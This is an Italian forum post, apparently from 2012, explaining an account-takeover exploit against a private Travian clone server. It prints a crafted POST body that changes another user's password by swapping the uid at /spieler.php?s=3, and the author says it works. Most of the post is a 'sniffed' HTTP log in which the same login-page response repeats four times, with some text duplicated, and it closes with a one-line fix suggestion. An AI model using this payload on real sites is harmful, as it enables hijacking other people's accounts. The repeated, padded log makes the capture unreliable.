Ultima modifica:
credo di aver capito l'exploit xD praticamente con questo programma lui logga nell'account che gli date poi si sposta nella path /spieler.php?s=3 ( per chi non lo sapesse è dove si può cambiare pwd / email / deltare acco ) poi se vi ricordate vi chiede l'uid + password. poi fa una richiesta POST sempre alla path di prima ( /spieler.php?s=3 ) ma invece di mettere l'uid dell'account loggato mette l'uid che gli avete inserito voi quindi dell'account di cui volete la password !!! e ovviamente la nuova password della vittima (pw2 e pw3 ) !!!!
ho testato manualmente modificnado le richieste ed effettivamente funziona , exploit banale ma efficace xD per chi non avesse capito na mazza ecco l'http log saltato fuori dallo sniffing mentre l'hack lavorava xD
byeZZZ
il fix pe chi sa codare php dovrebbe venire da se xD basta che checkate che l'uid immesso corrispondi con l'utente attualmente loggato !!!!!!!
ft=p3&uid=7&pw1=pwold&pw2=pwnuova&pw3=pwnuova&email_alt=&email_neu=&v1=&del=0&del_pw=&s1.x=0&s1.y=0
ho testato manualmente modificnado le richieste ed effettivamente funziona , exploit banale ma efficace xD per chi non avesse capito na mazza ecco l'http log saltato fuori dallo sniffing mentre l'hack lavorava xD
byeZZZ
GET /login.php HTTP/1.1
Host: solartravian.altervista.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=p0rifibq41mblic3ksmkuq62e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
GET /login.php HTTP/1.1
Host: solartravian.altervista.org
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=8q6j1nrsnd3nlkoc838pki5741; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
Host: solartravian.altervista.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=p0rifibq41mblic3ksmkuq62e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
GET /login.php HTTP/1.1
Host: solartravian.altervista.org
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=8q6j1nrsnd3nlkoc838pki5741; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
il fix pe chi sa codare php dovrebbe venire da se xD basta che checkate che l'uid immesso corrispondi con l'utente attualmente loggato !!!!!!!